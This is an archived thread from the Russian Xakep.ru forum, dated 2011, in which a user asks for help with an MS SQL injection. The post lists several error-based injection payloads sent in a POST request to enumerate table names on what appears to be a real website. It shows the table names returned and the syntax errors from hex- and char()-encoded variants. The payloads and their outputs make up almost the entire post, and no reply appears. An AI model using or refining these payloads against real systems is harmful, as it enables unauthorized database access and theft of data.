Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

MS SQL инъекция. Incorrect syntax near

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> MS SQL инъекция. Incorrect syntax near
Имя
Сообщение << Старые топики   Новые топики >>
MS SQL инъекция. Incorrect syntax near - 2011-12-25 14:43:43.930000   
frost18

Сообщений: 1
Оценки: 0
Присоединился: 2011-12-25 14:22:07.490000
 Добрый день. Хотел бы разобраться с ошибкой.
В пост запросе отправляю:

1 OR 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)–
Вернулось имя первой таблицы tblRedirectCount. Все ок!


1 OR 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tblRedirectCount'))–
И тут ошибка!
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Incorrect syntax near 'tblRedirectCount'.


Пробую имя таблицы передать HEX
1 OR 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (0x74626C5265646972656374436F756E74))–
Скрипт работает 20 сек и меня редиректит


Единственное получается вложенным запросом
1 OR 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES))–
Возвращает имя второй таблицы tblSelGroup_Catalog


Почему не получается явно исключать таблицы или колонки?



Пробывал записывать в ASCII код
1 OR 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN char(116)%2Bchar(98)%2Bchar(108)%2Bchar(82)%2Bchar(101)%2Bchar(100)%2Bchar(105)%2Bchar(114)%2Bchar(101)%2Bchar(99)%2Bchar(116)%2Bchar(67)%2Bchar(111)%2Bchar(117)%2Bchar(110)%2Bchar(116))–
Ошибка ! Incorrect syntax near 'char'.
Post #: 1
Страниц:  [1]
Все форумы >> [В Сети] >> MS SQL инъекция. Incorrect syntax near







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.